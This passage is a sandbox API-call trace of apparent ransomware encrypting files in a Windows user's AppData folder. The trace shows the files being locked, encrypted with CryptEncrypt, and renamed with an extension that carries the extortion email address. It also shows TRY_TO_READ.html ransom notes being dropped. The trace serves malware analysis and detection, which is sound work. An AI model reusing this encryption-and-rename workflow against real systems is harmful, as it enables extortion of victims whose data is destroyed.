lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav" [0129.303] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.303] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=73487) returned 1 [0129.303] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11f0f [0129.303] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.303] GetProcessHeap () returned 0x410000 [0129.303] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.303] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.304] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.306] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.307] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.308] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11f0f) returned 0xf70048 [0129.309] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11f0f) returned 0xf81f60 [0129.309] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.309] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x11f0f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x11f0f, lpOverlapped=0x0) returned 1 [0129.313] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11f0f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.313] CloseHandle (hObject=0x524) returned 1 [0129.313] GetProcessHeap () returned 0x410000 [0129.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.313] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ls2e_78ok.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LS2e_78ok.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ls2e_78ok.wav.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.317] GetProcessHeap () returned 0x410000 [0129.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.317] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0129.317] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0129.321] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0129.321] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0129.321] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0129.323] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60b17a10, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0xb1969580, ftLastAccessTime.dwHighDateTime=0x1d5e337, ftLastWriteTime.dwLowDateTime=0xb1969580, ftLastWriteTime.dwHighDateTime=0x1d5e337, nFileSizeHigh=0x0, nFileSizeLow=0xedfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="myMAU_n9.mp3", cAlternateFileName="")) returned 1 [0129.323] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mymau_n9.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.323] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.323] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xedfa, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.323] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.323] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.324] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.324] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.324] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.324] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.324] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3", dwFileAttributes=0x80) returned 1 [0129.324] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3") returned 59 [0129.324] GetProcessHeap () returned 0x410000 [0129.324] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0129.324] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3" [0129.324] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.325] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=60922) returned 1 [0129.325] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xedfa [0129.325] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.325] GetProcessHeap () returned 0x410000 [0129.325] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.325] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.325] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.327] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.328] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.329] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xedfa) returned 0xf70048 [0129.329] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xedfa) returned 0xf7ee50 [0129.329] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.330] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0xedfa, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xedfa, lpOverlapped=0x0) returned 1 [0129.332] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xedfa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.332] CloseHandle (hObject=0x524) returned 1 [0129.333] GetProcessHeap () returned 0x410000 [0129.333] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.333] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mymau_n9.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\myMAU_n9.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mymau_n9.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.336] GetProcessHeap () returned 0x410000 [0129.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.336] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4de42db0, ftCreationTime.dwHighDateTime=0x1d5dde0, ftLastAccessTime.dwLowDateTime=0x40c60850, ftLastAccessTime.dwHighDateTime=0x1d5deb3, ftLastWriteTime.dwLowDateTime=0x40c60850, ftLastWriteTime.dwHighDateTime=0x1d5deb3, nFileSizeHigh=0x0, nFileSizeLow=0x7e8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NQtFaYFh8MzBl.avi", cAlternateFileName="NQTFAY~1.AVI")) returned 1 [0129.336] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nqtfayfh8mzbl.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.336] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.336] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7e8a, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.337] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.337] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.337] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.337] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.338] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.338] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.338] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi", dwFileAttributes=0x80) returned 1 [0129.338] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi") returned 64 [0129.338] GetProcessHeap () returned 0x410000 [0129.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x431d68 [0129.338] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi" [0129.338] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.338] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=32394) returned 1 [0129.338] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7e8a [0129.338] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.338] GetProcessHeap () returned 0x410000 [0129.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.338] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.338] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.340] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.341] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e8a) returned 0x4e1b68 [0129.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e8a) returned 0xf70048 [0129.343] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.343] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x7e8a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x7e8a, lpOverlapped=0x0) returned 1 [0129.345] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7e8a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.345] CloseHandle (hObject=0x524) returned 1 [0129.346] GetProcessHeap () returned 0x410000 [0129.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.346] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nqtfayfh8mzbl.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NQtFaYFh8MzBl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nqtfayfh8mzbl.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.349] GetProcessHeap () returned 0x410000 [0129.349] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.349] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x584c5ed0, ftCreationTime.dwHighDateTime=0x1d5e6a5, ftLastAccessTime.dwLowDateTime=0xb3736940, ftLastAccessTime.dwHighDateTime=0x1d5e54f, ftLastWriteTime.dwLowDateTime=0xb3736940, ftLastWriteTime.dwHighDateTime=0x1d5e54f, nFileSizeHigh=0x0, nFileSizeLow=0x8ebd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O1ywiPju8Yfy.mp3", cAlternateFileName="O1YWIP~1.MP3")) returned 1 [0129.349] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\o1ywipju8yfy.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.349] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.349] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8ebd, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.349] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.349] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.350] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.350] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.350] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.350] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.350] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3", dwFileAttributes=0x80) returned 1 [0129.351] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3") returned 63 [0129.351] GetProcessHeap () returned 0x410000 [0129.351] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x431d68 [0129.351] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3" [0129.351] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.351] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=36541) returned 1 [0129.351] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x8ebd [0129.351] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.351] GetProcessHeap () returned 0x410000 [0129.351] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.351] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.351] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.352] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.354] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.355] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8ebd) returned 0xf70048 [0129.355] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8ebd) returned 0xf78f10 [0129.355] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.355] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x8ebd, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x8ebd, lpOverlapped=0x0) returned 1 [0129.358] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, 